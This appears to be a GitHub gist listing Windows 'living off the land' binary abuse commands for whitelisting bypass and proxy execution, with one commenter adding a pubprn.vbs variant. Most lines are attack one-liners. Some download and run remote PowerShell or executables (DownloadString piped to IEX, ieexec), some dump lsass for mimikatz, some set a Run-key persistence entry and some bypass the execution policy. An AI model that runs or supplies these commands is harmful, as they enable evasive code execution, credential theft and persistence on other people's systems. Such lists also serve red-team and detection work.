Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
bash.exe -c calc.exe
scriptrunner.exe -appvscript calc.exe
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
hh.exe or hh.exe c:\
certutil -Class scrobj.dll
certutil -Class http://WScript.Shell
certutil -urlcache -split -f
certutil.exe -URL will fetch ANY file and download it here: C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct http://[URL] - Doesn't exec. download only
regsvr32 /s /n /u /i: scrobj.dll
msbuild.exe pshell.xml
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
bginfo.exe bginfo.bgi /popup /nolicprompt
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
ieexec.exe http://x.x.x.x:8080/bypass.exe
msxsl.exe customers.xml script.xsl
odbcconf.exe /f my.rsp
sqldumper.exe 464 0 0x0110:40 - Dump lsass to mimikatz comp. dump
sqldumper.exe 540 0 0x01100
pcalua -a c:\datafolder\tester.bat
pcalua.exe -a \\server\payload.dll
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
C:\Program Files\Microsoft Office\root\client\AppVLP.exe calc.exe
C:\Program Files (x86)\Microsoft Office\root\client>appvlp calc.exe
winword /l dllfile.dll
InfDefaultInstall.exe shady.inf
sqldumper 540 0 0x01100
"C:\Program Files\Microsoft Office\root\client\AppVLP.exe" calc.exe
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe
AppVLP.exe \\webdav\calc.bat
Powershell host
diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
print /D:c:\ads\file.exe \\\tool\file.exe
print /D:c:\ads\CopyOfAutoruns.exe c:\ads\Autoruns.exe
*** Non-MS binaries ***
nvuhda6.exe System calc.exe
nvuhda6.exe Copy test.txt,test-2.txt
nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
nvuhda6.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe","","c:\windows\system32"
nvuhda6.exe KillApp calculator.exe
nvuhda6.exe Run foo
symerr.exe ("cclib.dll" in same directory) -
SynTPEnh.exe /SHELLEXEC somebinary.exe -
GfxDownloadWrapper.exe "" "C:\Temp\harmless.exe" -
RunCmd_x64.exe C:\windows\system32\calc.exe
plexscripthost.exe #Pythonscript engine
%USERPROFILE%\AppData\Local\slack\update.exe --processStart "test.exe"
Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
#Lotus notes
Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Run PowerShell via LotusNotes
C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
Execute calc.exe through DefaultInstall Section Directive in INF file.
#Nvidia GeForce Experience
courgette.exe -dis c:\temp\Autoruns.exe c:\temp\autoruns.asm
courgette.exe -asm c:\temp\autoruns.asm c:\temp\compiled\autorunsfromasm.exe

This comment has been minimized.

Copy link

commented Nov 11, 2017

You could add this even though it's a script:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.